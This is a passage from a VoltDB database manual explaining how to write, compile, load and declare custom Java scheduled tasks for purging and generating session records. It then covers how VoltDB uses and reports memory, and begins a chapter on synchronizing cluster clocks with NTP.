that is, when the task is first defined or\nwhen the database starts or resumes. The method must return an Action object, which includes the\nprocedure to call, arguments to that procedure, and a callback method to be invoked once the first\ninvocation is completed. In our example, the method creates an action using the PurgeOldSessions\nstored procedure, the initial batch size, and the callback procedure declared in the next step.\nA callback method\nFinally, your custom task must have a callback method (the method you specify when creating an Ac-\ntion object), which is invoked once the specified procedure instance completes. The callback method\nmust return another Action, similar to getFirstAction.\nIn our example, the callback compares the current batch size to the number of records deleted by\nthe last run and makes appropriate adjustments. It decreases the batch size if less than 80% were\ndeleted, it increases the batch size if the full batch was used, and it keeps the size within the specified\nminimum and maximum. In this case, we are changing the arguments only, not the stored procedure\ninvoked. Although that is possible if your application requires it.\nNote that the callback method can be a name of your choosing. It does not have to be callback().\nYou are also not constrained to using just one callback; you might select different callback methods\nbased on which stored procedure you are invoking or the current application context.\nExample 11.1, “Custom Task Implementing ActionGenerator” shows the completed example task class,\nwith the key elements highlighted.\n64Creating Custom Tasks\nExample 11.1. Custom Task Implementing ActionGenerator\npackage mytasks;\nimport java.util.concurrent.TimeUnit;\nimport org.voltdb.VoltTable;\nimport org.voltdb.client.ClientResponse;\nimport org.voltdb.task.*;\npublic class PurgeBatches implements ActionGenerator { \n private TaskHelper helper;\n private long min, max, batchsize;\n public void initialize (TaskHelper helper, \n long min, long max, long batch) {\n this.min = min;\n this.max = max;\n this.batchsize = batch;\n }\n public Action getFirstAction () { \n return Action.procedureCall(this::callback, \n \"PurgeOldSessions\", this.batchsize);\n }\n /* \n * Callback to handle the result of the task \n * and return next Action.\n */\n private Action callback (ActionResult result) { \n /* Find out how many records were deleted */\n ClientResponse response = result.getResponse();\n VoltTable[] results = response.getResults();\n long count = results[0].fetchRow(0).getLong(0);\n /* If less than 80%, decrease by 10% */\n if (count < this.batchsize * .8) \n this.batchsize -= this.max * .1;\n /* If equal to batch size, increase by 10% */\n if (count == this.batchsize) \n this.batchsize += this.max * .1;\n /* Stay within min & max */\n if (this.batchsize > this.max) this.batchsize = this.max;\n if (this.batchsize < this.min) this.batchsize = this.min;\n \n return Action.procedureCall(this::callback, \n \"PurgeOldSessions\", this.batchsize);\n }\n}\n65Creating Custom Tasks\n11.2.2. Compiling and Loading the Class into VoltDB\nOnce you complete your Java source code, you need to compile, debug, and package it into a JAR file\nso it can be loaded into VoltDB. You compile and package task classes the same way you compile and\npackage stored procedures. In fact, you can package tasks and procedures into the same or separate JARs\nif you choose. The following example compiles the Java classes in the src folder and packages them into\nthe JAR file sessiontasks.jar :\n$ javac -classpath \"/opt/voltdb/voltdb/*\" \\\n -d ./obj src/*.java\n$ jar cvf sessiontasks.jar -C obj . \nYou then load the classes from the JAR file into VoltDB using the sqlcmd LOAD CLASSES directive:\nLOAD CLASSES sessiontasks.jar;\n11.2.3. Declaring the Task\nFinally, once the custom class is loaded into the database, you can declare the task and start it running.\nYou declare the task using the CREATE TASK statement, replacing a procedure name with the FROM\nCLASS clause specifying the classpath to your new class. In our example, the custom task also requires\nthree arguments: a minimum, maximum and starting batch size.\nBecause the stored procedure that the custom class specifies is a directed procedure (that is, it runs sep-\narately on every partition on the cluster), the task must be declared to RUN ON PARTITIONS. If the\nprocedure was not directed, the task could be run on PARTITIONS, DATABASE, or HOSTS. However,\nfor partitioned tables it is often necessary to have partitioned or directed procedures if the procedure's\nstatements need to both ORDER BY and LIMIT the rows.\nThe following statement creates the custom task with a minimum batch size of 100 records, a maximum\nof 2,000, and a starting size of 1,000.\nCREATE TASK batchcleanup \n ON SCHEDULE EVERY 5 SECONDS\n PROCEDURE FROM CLASS mytasks.PurgeBatches\n WITH (100,2000,1000)\n RUN ON PARTITIONS;\nNote that the task starts as soon as it is declared, unless you include the DISABLE clause. Alternately, you\ncan use the ALTER TASK statement to change the state of the task. For example, the following statement\ndisables our newly created task:\nALTER TASK batchcleanup DISABLE;\n11.3. Modifying the Interval Between Invocations\nTo customize the interval between invocations of the task's stored procedure, you create a custom task\nthat implements the IntervalGenerator interface. The custom task consists of the Java class you create,\nand the SQL statements to load and declare the task. At run time, for each invocation of the task, VoltDB\nuses the custom class to determine how long to wait before invoking the stored procedure specified in\nthe task definition.\nLet's look at an example. Say we want a task, similar to the previous example, that periodically deletes\nunused sessions. The task can use the same stored procedure as before, this time with a fixed batch size\npassed in as an argument when declaring the task:\n66Creating Custom Tasks\nCREATE PROCEDURE PurgeOldSessions DIRECTED AS\n DELETE FROM session \n WHERE last_access < DATEADD(MINUTE,-5,NOW()) \n ORDER BY sessionID ASC LIMIT ?;\nNow we want to customize how frequently the procedure runs — increasing the frequency if it always\ndeletes the full batch, or decreasing the frequency if fewer records are deleted each time. To do this we\ncreate a custom task that checks how many records were actually deleted in each run. If the count of deleted\nrecords is less than 80% of the batch size, increase the interval between runs. On the other hand, if the\nnumber deleted records equals the batch size, increase the frequency by reducing the interval. Finally, we\ncan use parameters to the custom task to specify the minimum, maximum, and starting frequency, as well\nas the batch size.\n11.3.1. Designing a Java Class That Implements IntervalGen-\nerator\nThe first step is to write a Java class that implements the IntervalGenerator interface. This must be a static\nclass whose constructor takes no arguments. In our example, we will also declare class variables for a\nhelper object that is used in subsequent methods and minimum, maximum, and initial values for interval,\nplus the batch size.\nThe class must, at a minimum, declare or override three methods:\ninitialize()\nThe initialize() method is called first and receives a helper object inserted automatically by\nthe subsystem that manages tasks, plus any parameters defined by the task definition in SQL. In our\nexample there are four parameters from the task definition, which the method stores in the variables\ndeclared earlier. So the initialize() method ends up having a total of five arguments.\nGetFirstInterval()\nThe getFirstInterval() method is called when the task starts; that is, when the task is first\ndefined or when the database starts or resumes. The method must return an Interval object, which\nspecifies the length of time to wait until the first execution of the task as well as a callback to invoke\nafter the task runs. In our example, we initialize the Interval object with the current interval value,\nthe MILLISECONDS time unit, and the callback defined in the next step.\nA callback method\nFinally, your custom task must have a callback method (the method you specify when creating the\nInterval object), which is invoked when the task completes. The callback method must return another\nInterval, similar to getFirstInterval() .\nIn our example, the callback compares the batch size to the number of records deleted by the last run\nand makes appropriate adjustments to the next interval. It increases the frequency by reducing the\ninterval if the full batch was used, it decreases the frequency by extending the interval if less than\n80% was used, and it keeps the interval within the specified minimum and maximum.\nNote that the callback method can be any name you choose. It does not have to be callback()\nand you can specify different callback methods each time if your application logic requires it.\nExample 11.2, “Custom Task Implementing IntervalGenerator” shows the completed example task class,\nwith the key elements highlighted.\n67Creating Custom Tasks\nExample 11.2. Custom Task Implementing IntervalGenerator\npackage mytasks;\nimport java.util.concurrent.TimeUnit;\nimport org.voltdb.VoltTable;\nimport org.voltdb.client.ClientResponse;\nimport org.voltdb.task.*;\npublic class PurgeIntervals implements IntervalGenerator {\n private TaskHelper helper;\n private long min, max, delta, batchsize;\n public void initialize (TaskHelper helper, \n long min, long max, \n long delta, long batch) {\n this.min = min;\n this.max = max;\n this.batchsize = batch;\n }\n public Interval getFirstInterval() { \n return new Interval(this.delta, TimeUnit.MILLISECONDS,\n this::callback);\n }\n /* \n * Callback to handle the result of the task \n * and return next Action.\n */\n private Interval callback (ActionResult result) { \n /* Find out how many records were deleted */\n ClientResponse response = result.getResponse();\n VoltTable[] results = response.getResults();\n long count = results[0].fetchRow(0).getLong(0);\n \n /* If less than 80%, increase by 10% */\n if (count < this.batchsize * .8) \n this.delta += this.max * .1;\n /* If equal to batch size, decrease by 10% */\n if (count == this.batchsize) \n this.delta -= this.max * .1;\n /* Stay within min & max */\n if (this.delta > this.max) this.delta = this.max;\n if (this.delta < this.min) this.delta = this.min;\n \n return new Interval(this.delta, TimeUnit.MILLISECONDS,\n this::callback);\n }\n}\n68Creating Custom Tasks\n11.3.2. Compiling and Loading the Class into VoltDB\nOnce you complete your Java source code, you compile, debug, and package it into a JAR file the same\nway you compile and package stored procedures. In fact, you can package tasks, procedures, and other\nclasses (such as user-defined functions) into a single or separate JARs depending on your application and\noperational needs. The following example compiles the Java classes in the src/ folder and packages them\ninto the JAR file sessiontasks.jar :\n$ javac -classpath \"/opt/voltdb/voltdb/*\" \\\n -d ./obj src/*.java\n$ jar cvf sessiontasks.jar -C obj . \nYou then load the classes from the JAR file into VoltDB using the sqlcmd LOAD CLASSES directive:\nLOAD CLASSES sessiontasks.jar;\n11.3.3. Declaring the Task\nFinally, once the custom class is loaded into the database, you can declare the task and start it running. You\ndeclare the task using the CREATE TASK statement, replacing the ON SCHEDULE static interval with\nFROM CLASS specifying the classpath of your new class. In our example, the custom task also requires\nfour arguments: a minimum, maximum and starting interval, plus the batch size. (The same batch size\npassed to the stored procedure PurgeOldSessions.) The following statement creates the custom task with\na minimum interval of 100ms (a tenth of a second), a maximum of 10 seconds, an initial interval of 1\nsecond, and a batch size of 500 records.\nCREATE TASK timecleanup \n ON SCHEDULE FROM CLASS mytasks.PurgeIntervals\n WITH (100,10000,1000,500)\n PROCEDURE PurgeOldSessions WITH (500)\n RUN ON PARTITIONS;\nBecause the stored procedure PurgeOldSessions is a directed procedure (that is, it runs separately on every\npartition on the cluster), the task must be declared to RUN ON PARTITIONS.\nThe task starts as soon as it is declared, unless you include the DISABLE clause. Alternately, you can\nuse the ALTER TASK statement to change the state of the task. For example, the following statement\ndisables our newly created task:\nALTER TASK timecleanup DISABLE;\n11.4. Modifying Both the Procedure and Interval\nTo allow full customization of the task — including the procedure, its arguments, and the interval between\ninvocations — you create a custom task that implements the ActionScheduler interface. The custom task\nconsists of the Java class you create, and the SQL statements to load and declare the task. At run time, for\neach invocation of the task, VoltDB uses the custom class to determine what procedure to invoke, what\narguments to pass to the procedure, and how long to wait before invoking it.\nLet's look at an example. The previous examples create tasks for purging old sessions from a database.\nBut how can you tell that these tasks work without a real application? One way is to create a test database\nwith tasks to emulate the expected workload, generating new sessions on an ongoing basis.\n69Creating Custom Tasks\nFor our example, we want a task that generates sessions, but not so many the number of sessions created\nexceeds the number deleted. So our custom task needs to perform two actions:\n1.Check to see how many session records are in the database.\n2.If the task hasn't reached its target goal, generate up to 1,000 new sessions. Then repeat step 1.\nIn other words, we need two separate procedures: one to count the number of session records and another to\ninsert a new session record. To count all session records in the database, the first procedure, CountSessions ,\nmust be multi-partitioned. (It also checks for the maximum value of the session ID so it can generate an\nincrementally unique ID.) But the second procedure, AddSession , can be partitioned since it is inserting\ninto a partitioned table. This way the task reproduces the actions and performance of a running application.\nCREATE PROCEDURE CountSessions AS\n SELECT COUNT(*), MAX(sessionID) FROM session;\nCREATE PROCEDURE AddSession PARTITION ON TABLE SESSION COLUMN sessionID AS\n INSERT INTO session (sessionID,userID) VALUES(?,?);\nThe custom task will decide which procedure to invoke, and how long to wait between invocations, based\non the results of the previous execution. There are many ways to do this, but for the sake of example, our\ncustom task uses two separate callback methods: one to evaluate the results of the CountSessions procedure\nand one to evaluate the results of the AddSession procedure, as described in the next section.\n11.4.1. Designing a Java Class That Implements Ac-\ntionScheduler\nThe majority of the work of a custom class is performed by a Java class that implements a task interface;\nin this case, the ActionScheduler interface. It must be a static class whose constructor takes no arguments.\nThe class must, at a minimum, declare or override three methods:\ninitialize()\nThe initialize() method is called first and receives a helper object inserted automatically by\nthe subsystem that manages tasks, plus any parameters defined by the task definition in SQL. In our\nexample there is one parameter in the task definition: the target number of records to create. So the\ninitialize() method has a total of two arguments.\nGetFirstInterval()\nThe getFirstInterval() method is called when the task starts; that is, when the task is first\ndefined or when the database starts or resumes. The method must return a ScheduledAction object,\nwhich specifies the length of time to wait until the first execution of the task, a callback to invoke\nafter the task runs, plus the name of the procedure and any arguments the procedure requires. In our\nexample, we initialize the ScheduledAction object with no wait time (that is, an interval of zero), the\ncallback for the CheckSessions procedure, and the procedure itself.\ncallback methods\nAfter each iteration of the task, VoltDB invokes the specified callback procedure. In our example,\nthere are two callback methods:\n•checkcallback — The task specifies this as the callback method to invoke after each iteration of\nthe CheckSessions stored procedure. The callback checks the results for the number of session\nrecords. (it also saves the highest value of the session ID so it can generate an incrementally unique\nID for each new record.) If the number of records is less than the goal, it schedules the AddSession\n70Creating Custom Tasks\nprocedure as the next task, specifying loadcallback() as the callback method. If the goal has\nbeen met, no more records need to be added so the callback backs off on the frequency (increasing\nthe interval) and schedules the CheckSessions procedure again.\n•loadcallback — After each execution of the AddSession procedure, the callback reduces the batch\nsize by one. If the batch is not complete, the callback reschedules the AddSession procedure, wait-\ning 2 milliseconds. If the batch of inserts has been completed (that is, the batch size is down to ze-\nro), the callback schedules the CheckSessions procedure, specifying its callback method check-\ncallback() to see if there is now a full complement of session records.\nTwo things to note about this process are that if the session table is filled to the specified goal, the\ncheckcallback uses the ability to customize the interval to reduce the frequency of checking — to\nminimize the impact on other transactions. Also, besides scheduling different stored procedures at\ndifferent times, it passes different arguments as well, inserting a unique session ID and randomized\nuser ID for each AddSession invocation.\nExample 11.3, “Custom Task Implementing ActionScheduler” shows the completed example task class,\nwith the key elements highlighted.\nExample 11.3. Custom Task Implementing ActionScheduler\npackage mytasks;\nimport java.util.Random;\nimport java.util.concurrent.TimeUnit;\nimport org.voltdb.VoltTable;\nimport org.voltdb.client.ClientResponse;\nimport org.voltdb.task.*;\npublic class LoadSessions implements ActionScheduler {\n private TaskHelper helper;\n private long batch, wait, nextid, goal;\n public void initialize(TaskHelper helper, long goal) { \n this.goal = goal;\n this.wait = 0;\n }\n public ScheduledAction getFirstScheduledAction() { \n return ScheduledAction.procedureCall(0, TimeUnit.MILLISECONDS, \n this::checkcallback, \"CountSessions\");\n }\n /*\n * Callbacks to handle the results of the check task \n * and the load task\n */\n private ScheduledAction checkcallback(ActionResult result) { \n \n ClientResponse response = result.getResponse();\n VoltTable[] results = response.getResults();\n71Creating Custom Tasks\n long recordcount = results[0].fetchRow(0).getLong(0);\n this.nextid = results[0].fetchRow(0).getLong(1);\n \n if (recordcount == 0) this.nextid = 0; /* start fresh*/\n this.batch = this.goal - recordcount;\n if (this.batch > 0) {\n /* Start loading data. Max batch size is 1,000 records */\n this.batch = (this.batch < 1000) ? this.batch : 1000;\n this.nextid++;\n return ScheduledAction.procedureCall(2, TimeUnit.MILLISECONDS, \n this::loadcallback, \"AddSession\", \n this.nextid,randomuser());\n } else {\n /* schedule the next check. */\n this.wait += 500;\n if (this.wait > 60000) this.wait = 60000;\n return ScheduledAction.procedureCall(this.wait, TimeUnit.MILLISECONDS, \n this::checkcallback, \"CountSessions\");\n }\n }\n private ScheduledAction loadcallback(ActionResult result) { \n this.batch--;\n if (this.batch > 0 ) {\n /* Load next session */\n this.nextid++;\n return ScheduledAction.procedureCall(2, TimeUnit.MILLISECONDS, \n this::loadcallback, \"AddSession\", \n this.nextid,randomuser());\n } else {\n /* schedule the next check. */\n System.out.println(\" Done.\");\n this.wait = 0;\n return ScheduledAction.procedureCall(this.wait, TimeUnit.MILLISECONDS, \n this::checkcallback, \"CountSessions\");\n }\n }\n \n private long randomuser() { return new Random().nextInt(1001); }\n}\n11.4.2. Compiling and Loading the Class into VoltDB\nOnce you complete your Java source code, you compile, debug, and package it into a JAR file the same way\nyou compile and package stored procedures. You can package tasks, procedures, and other classes (such\nas user-defined functions) into a single or separate JARs depending on your application and operational\nneeds. The following example compiles the Java classes in the src folder and packages it into the JAR\nfile sessiontasks.jar :\n$ javac -classpath \"/opt/voltdb/voltdb/*\" \\\n -d ./obj src/*.java\n$ jar cvf sessiontasks.jar -C obj . \n72Creating Custom Tasks\nYou then load the classes from the JAR file into VoltDB using the sqlcmd LOAD CLASSES directive:\nLOAD CLASSES sessiontasks.jar;\n11.4.3. Declaring the Task\nOnce the custom class is loaded into the database, you can declare the task and start it running. You declare\nthe task using the CREATE TASK statement, replacing both the ON SCHEDULE and PROCEDURE\nclauses with a single FROM CLASS clause specifying the classpath of your new class. In our example,\nthe custom task also requires one argument: the target value for the maximum number of session records\nto create. The following statement creates the custom task with a goal of 10,000 records.\nCREATE TASK loadsessions \n FROM CLASS mytasks.LoadSessions WITH (10000)\n RUN ON DATABASE;\nNote that the task is defined to RUN ON DATABASE. This means only one instance of the task is running\nat one time. However, the stored procedures will run as defined; that is, the CheckSessions procedure\nwill run as a multi-partitioned procedure and each instance of AddSession will be executed on a specific\npartition based on the unique partition ID passed in as an argument at run-time.\nThe task starts as soon as it is declared, unless you include the DISABLE clause. Alternately, you can\nuse the ALTER TASK statement to change the state of the task. For example, the following statement\ndisables our newly created task:\n3> ALTER TASK loadsessions DISABLE;\n73Chapter 12. Understanding VoltDB\nMemory Usage\nVoltDB is an in-memory database. Storing data in memory has the advantage of eliminating the perfor-\nmance penalty of disk accesses (among other things). However, with the complex interaction of VoltDB\nmemory usage and how operating systems allocate and deallocate memory, it can be tricky understanding\nexactly how much memory is being used at any given time. For example, deleting rows of data can result\nin a temporary increase in memory usage, which seems counterintuitive at first.\nThis chapter explains how VoltDB uses memory, the impact of system memory allocation and deallocation\nfunctions on your database's memory utilization, and variables available to you to help control memory\nusage.\n12.1. How VoltDB Uses Memory\nThe memory that VoltDB uses can be grouped, loosely, into three buckets:\n•Persistent\n•Semi-persistent\n•Temporary\nPersistent memory is, as you might expect, the memory used for storing actual database records, including\ntables, indexes, and views. The larger the volume of data in the database, the more memory required to\nstore it. String and varbinary columns longer than 63 bytes are not stored in line. Instead they are stored\nas pointers to the content in a separate string storage area, which is also part of persistent memory.\nSemi-persistent memory is used for temporary storage while processing SQL statements and certain system\nprocedures. In particular, semi-persistent memory includes temporary tables and the undo buffer.\n•Temporary tables are where data is processed as part of an SQL statement. For example, if you execute\nan SQL statement like SELECT * FROM flight WHERE DESTINATION='LAX' , all of the tuples\nmeeting the selection criteria are copied into temporary tables before being returned to the initiator.\nIf the stored procedure is multi-partitioned, each partition creates a copy of its tuples and the initiator\nmerges the multiple copies.\n•The undo buffer is also associated with the execution of SQL statements. Any tuples that are modified\nor deleted as part of an SQL statement are recorded in the undo buffer until the transaction is committed\nor rolled back.\nSemi-persistent memory is also used for buffers related to system activities such as snapshots and export.\nWhile a snapshot is occurring, a certain amount of memory is required for overhead, as well as copy-on-\nwrite buffers. Normally, snapshots are written directly from the tables in memory, thus requiring no addi-\ntional overhead. However, if snapshots are non-blocking (performed asynchronously while other transac-\ntions are executing), any tuples that need to be modified before they are written to the snapshot get copied\ninto semi-persistent memory. This technique is known as \"copy-on-write\". The consequence is that mixing\nasynchronous snapshots with frequent deletes and updates will increase the memory usage.\nSimilarly, when export is enabled, any insertions into export streams are written to an export buffer in\nsemi-persistent memory until the export connector sends the data to the export target.\n74Understanding Volt-\nDB Memory Usage\nTemporary memory is used by VoltDB to manage the queueing and distribution of procedures to the\nindividual partitions. Temporary memory includes the queue of pending procedure invocations as well as\nbuffers for the return values for the completed procedures (until the client application retrieves them).\nFigure 12.1, “The Three Types of Memory in VoltDB” illustrates how the three types of memory are\nallocated in VoltDB.\nFigure 12.1. The Three Types of Memory in VoltDB\nThe sum of the persistent, semi-persistent, and temporary memory is what makes up the total memory\n(what is referred to as resident set size, or RSS) used by VoltDB on the server.\n12.2. Actions that Impact Memory Usage\nThere are a number of actions that impact the amount of memory VoltDB uses during operation. Obviously,\nthe more data that is stored within the partition (including all tables, indexes, and views), the more memory\nis required for persistent storage. Similarly for snapshotting and export, when these functions are enabled,\nthey require some amount of semi-persistent storage. However, under normal conditions, the memory\nrequirements for snapshotting and export should be relatively consistent over time.\nTemporary storage, on the other hand, fluctuates depending on the workload and type of transactions\nbeing executed. If the client applications are \"firehosing\" (sending stored procedure requests faster than the\nservers can process them), the temporary storage required for pending procedure invocations will grow.\nSimilarly, if the parameters being submitted to the procedures or the data being returned is large in size\n(up to 50 megabytes per procedure), the buffer for return values can grow significantly.\nThe nature of the workload also has an impact on the amount of semi-persistent storage. Read-only queries\ndo not require space in the undo buffer. However, complex queries and queries that return large data sets\n75Understanding Volt-\nDB Memory Usage\nrequire space for temporary tables. On the other hand, update and delete queries can take up significant\nspace in the undo buffer, especially when a single transaction (or stored procedure) performs multiple\nqueries, each requiring undo support.\nThe use of the temporary and semi-persistent storage explains fluctuations that can be seen in overall\nmemory utilization of servers running VoltDB. Although delete operations do eventually release memory\nused by the persistent storage, they initially require more memory in the undo buffer and for any temporary\ntable operations. Once the entire transaction is complete and committed, the space in persistent storage\nand undo buffer is freed up. Note, however, that the unused space may not immediately be visible in the\nsystem RSS reports. The amount of memory in use and the amount of memory allocated can vary as a\nresult of the interaction of several different memory management schemes that all come into play.\nWhen VoltDB frees up space in persistent storage, it does not immediately return that memory to the\noperating system. Instead, it keeps track of unused space, which is then reused the next time a tuple is\nstored. Over time, memory can become fragmented. If the fragmentation reaches a preset level, the memory\nis compacted and unused space is deallocated and returned to the operating system.\nFigure 12.2. Details of Memory Usage During and After an SQL Statement\nFigure 12.2, “Details of Memory Usage During and After an SQL Statement” illustrates how a delete\noperation can have a delayed effect on overall memory allocation.\n1.At the beginning of the transaction, the deleted tuples are recorded in the semi-persistent undo buffer,\nincreasing memory usage. Any freed persistent storage is returned to the VoltDB list of free space.\n2.At the end of the transaction, the undo buffer is freed. However, the storage for the deleted tuples in\npersistent storage is managed and may not be released immediately.\n3.Over time, free memory is used for new tuples, until...\n76Understanding Volt-\nDB Memory Usage\n4.At some point, VoltDB compacts any fragmented memory and releases unused blocks to the system.\nHow and when memory is actually deallocated depends on what that memory is being used for and how it\nis managed. The following section Section 12.3, “How VoltDB Manages Memory” describes how VoltDB\nmanages memory in more detail.\nFinally, there are some combinations of factors that can aggravate the fluctuations in memory usage. The\nmemory required for snapshotting is usually not significant. However, if non-blocking snapshots are in-\ntermixed with update-heavy transactions, the snapshot copy-on-write buffer can grow rapidly.\nSimilarly, the memory used for export can grow if export is enabled but the connector cannot reach the\ntarget destination to clear the export buffer. However, the export buffer size is constrained; after a certain\npoint any additional export data that is not acknowledged by the connector is written out as export overflow\nto disk. So memory used for export queues does not grow indefinitely.\n12.3. How VoltDB Manages Memory\nTo manage memory effectively, VoltDB does not immediately release all unused memory. Allocating\nand deallocating small chunks of memory frequently can be expensive. Instead, VoltDB manages unused\nmemory until larger chunks are available. Similarly, the Java runtime and the operating system perform\ntheir own memory pooling techniques.\nAs a result, RSS is not an exact measurement of actual memory usage. However, VoltDB offers statistics\nthat provide a detailed breakdown of how it is using the memory that it has currently allocated. These sta-\ntistics provide a more meaningful representation of VoltDB's memory usage than the lump sum allocation\nreported by the operating system RSS.\nVoltDB manages memory for persistent and semi-persistent storage aggressively to ensure unused space\nis compacted and released when available. In some cases, memory is returned to the operating system,\nmaking the RSS more responsive to changes in the database contents. In other cases, where memory is\nmanaged as a pool of resources, VoltDB provides detailed statistics on what memory is allocated and what\nis actually in use.\nPersistent storage for database tables (tuples) and indexes is compacted when fragmentation reaches a set\npercentage of total memory. Compaction eliminates fragmentation and allows memory to be returned to\nthe operating system as the database volume changes. At the same time, storage for variable data such as\nstrings and varbinary data greater than 63 bytes in length is being managed as a pool of resources. Free\nmemory in the pool is not immediately returned to the operating system. VoltDB holds and reuses memory\nthat is allocated but unused for these objects.\nThe consequence of these changes is that when you delete rows, the allocated memory for VoltDB (as\nshown by RSS) may go up during the delete operation (to allow for the undo buffer), but then it will go\ndown — by differing amounts — based on the type of content that is deleted. Memory for tuples not\ncontaining large strings or binary data is returned to the operating system quickly. Memory for large string\nand binary data is not returned but is held for later reuse.\nIn other words, the pool size for non-inline string and binary data tends to reach a maximum size (based\non the maximum required for your application workload) and then stabilize. Whereas memory for indexes\nas well as numeric and short string data oscillates as your application needs vary.\nTo help you understand these changes, the @Statistics system procedure tells you how much memory\nVoltDB is using and how much unused memory is being held for each type of content. These statistics\nprovide a more accurate view of actual memory usage than the lump sum value of system RSS.\n77Understanding Volt-\nDB Memory Usage\n12.4. How Memory is Allocated and Deallocated\nTechnically, persistent and semi-persistent memory within VoltDB is managed using code written in C++.\nTemporary memory is managed using code written in Java. What language the source code is written\nin is not usually relevant, except in the case of memory, because different languages manage memory\ndifferently. C++ uses the traditional explicit allocation and deallocation of memory, where the application\ncode controls exactly how and when memory is assigned and deassigned. In Java, memory is not explicitly\nallocated and deallocated. Instead, Java uses what is called \"garbage collection\" to free up memory that\nis not in use.\nTo complicate matters, the language libraries themselves do some performance optimizations to avoid\nallocating and deallocating memory from the operating system too frequently. So even if VoltDB explicitly\nfrees memory in persistent or semi-persistent storage, that memory may not be immediately returned to\nthe operating system or alter the process's perceived RSS value.\nFor temporary storage (which is managed in Java), VoltDB cannot explicitly control memory allocation\nand deallocation and relies on the Java virtual machine (JVM) to manage memory appropriately. The JVM\ndecides when and how to collect free space from unused objects. This means that the VoltDB server cannot\ndirectly control if and when the memory associated with temporary storage is returned to the operating\nsystem.\n12.5. Controlling How Memory is Allocated\nDespite the fact that you as a developer or database administrator cannot control when temporary storage\nis allocated and freed, you can control how much memory is used. Java provides a way to specify the size\nof the heap, the portion of memory the JVM uses to store runtime data such as class instances, arrays,\netc. The -Xms and -Xmx arguments to the java command specify the initial and maximum heap size,\nrespectively.\nBy setting both the -Xmx and -Xms arguments, you can control not only the maximum amount of memory\nused, but also the amount of fluctuation that can occur. Figure 12.3, “Controlling the Java Heap Size”\nillustrates how the -Xms and -Xmx arguments can be used to control the overall size of temporary storage.\n78Understanding Volt-\nDB Memory Usage\nFigure 12.3. Controlling the Java Heap Size\nHowever, you must be careful when setting the values for the Java heap size, since the JVM will not exceed\nthe value you set as a maximum. It is possible, under some conditions, to force a Java out-of-memory\nerror if the maximum heap size is not large enough for the temporary storage VoltDB requires. See the\nVoltDB Planning Guide for recommendations on calculating the appropriate heap size for your specific\napplication.\nRemember, temporary storage is used to queue the procedure requests and responses. If you are using syn-\nchronous procedures calls (and therefore little or no queuing on the server) a small heap size is acceptable.\nAlso, if the size of the procedure invocations (in terms of the arguments passed into the procedures) and the\nreturn values are small, a lower heap size is acceptable. But if you are invoking procedures asynchronously\nwith large argument lists or return values, be very careful when setting a low maximum heap size.\n12.6. Understanding Memory Usage for Specific\nApplications\nTo help understand the memory usage for a specific VoltDB database, the @Statistics system procedure\nprovides memory usage information. The \"MEMORY\" keyword returns a separate row of data for each\nserver in the cluster, with columns providing information about the different aspects of memory usage,\nas described in the following table.\nColumn Type of Storage Description\nJAVAUSED Temporary The amount of memory currently in use for tempo-\nrary storage.\nJAVAUNUSED Temporary The maximum amount of Java heap allocated but\nnot currently in use.\nTUPLECOUNT Persistent The number of tuples currently being held in mem-\nory.\nTUPLEDATA Persistent The amount of memory in use to store inline table\ndata.\n79Understanding Volt-\nDB Memory Usage\nColumn Type of Storage Description\nTUPLEALLOCATED Persistent The amount of memory allocated for table storage.\nThis includes the amount in use and any free space\ncurrently being held by VoltDB.\nINDEXMEMORY Persistent The approximate amount of memory in use to store\nindexes.\nSTRINGMEMORY Persistent The approximate amount of memory in use for non-\ninline string and binary storage.\nPOOLEDMEMORY Persistent The total amount allocated to pooled memory, in-\ncluding the memory assigned for storing strings, in-\ndexes, free lists, and metadata associated with tuple\nstorage.\nRSS All The resident set size for the VoltDB server process.\nYou can use periodic calls to the @Statistics system procedure with the \"MEMORY\" keyword to track\nyour database cluster's memory usage in detail. But if you are only looking for an overall picture, VoltDB\nprovides simple graphs at runtime.\nConnect to a VoltDB server's HTTP port (by default, http://<server-name>:8080) to see graphs of basic\nmemory usage for that server, including total resident set size (RSS), used Java heap and unused Java heap.\nMemory statistics are collected and displayed over three different time frames: 2 minutes, 30 minutes, and\n24 hours. Click on the web browser's refresh button to update the charts.\n80Chapter 13. Managing Time\nIn VoltDB, differences in system clocks do not directly impact database latency since each partition op-\nerates indpendently. However, there are several database activities that need to be globally managed, such\nas when the database starts or failed nodes rejoin the cluster. For these activities, differences in clock time\ncan impact — or, if the skew is large enough, even interrupt — proper operation.\nThat is why it is important to ensure a stable and consistent view of time within a VoltDB cluster using\na time synchronization service such as NTP or chrony. This chapter presents some best practices for con-\nfiguring and managing time using NTP.\nIf you are familiar with NTP or another service and have a preferred method for using it, you may want\nto read only Section 13.1, “The Importance of Time” and Section 13.2.2, “Troubleshooting Issues with\nTime”. If you are not familiar with NTP, this chapter suggests an approach that has proven to provide\nuseful results in most situations.\nThe following sections explain:\n•Why time is important to a VoltDB cluster\n•How to use NTP to manage time across the cluster\n•Special considerations when using VoltDB in a hosted or cloud environment\n13.1. The Importance of Time\nBecause certain operations require coordination between the server nodes, it is important that they agree\non what time it is. When the database process starts, VoltDB determines the maximum amount of skew\n(that is, the difference in clock time) between the individual nodes in the cluster. If the skew is greater than\n200 milliseconds (2/10ths of a second), the VoltDB cluster refuses start.\n13.2. Using NTP to Manage Time\nNTP (Network Time Protocol) is a protocol and a set of system tools that help synchronize time across\nservers. The actual purpose of NTP is to keep an individual node's clock \"accurate\". This is done by having\nthe node periodically synchronize its clock with a reference server. You can specify multiple servers to\nprovide redundancy in case one or more time servers are unavailable.\nThe important point to note here is that VoltDB doesn't care whether the cluster view of time is \"correct\"\nfrom a global perspective, but it does care that they all have the same view. In other words, it is important\nthat the nodes all synchronize to the same reference time and server.\n13.2.1. Basic Configuration\nTo manage time effectively with NTP on a VoltDB cluster you must:\n•Start NTP on each node\n•Point each instance of NTP to the same set of reference servers\nYou start NTP by starting the NTP1 service, or daemon, on your system. On many systems, starting the\nNTP daemon happens automatically on startup. You do not need to perform this action manually. However,\n1The name of the NTP service varies from system to system. For Debian-based operating systems, such as Ubuntu, the service name is \"ntp\". For\nRed Hat-based distributions, such as CentOS, the service name is \"ntpd\".\n81Managing Time\nif you need to make adjustments to the NTP configuration, it is useful to know how to stop and start the\nservice. For example, the following command starts the daemon2:\n$ service ntp start -x\nYou specify the time server(s) in the NTP configuration file (usually /etc/ntp.conf ). You can specify\nmultiple servers, one server per line. For example:\nserver clock.psu.edu\nThe configuration file is read when the NTP service starts. So, if you change the configuration file after\nNTP is running, stop and restart the service to have the new configuration options take affect.\n13.2.2. Troubleshooting Issues with Time\nIn many cases, the preceding basic configuration is 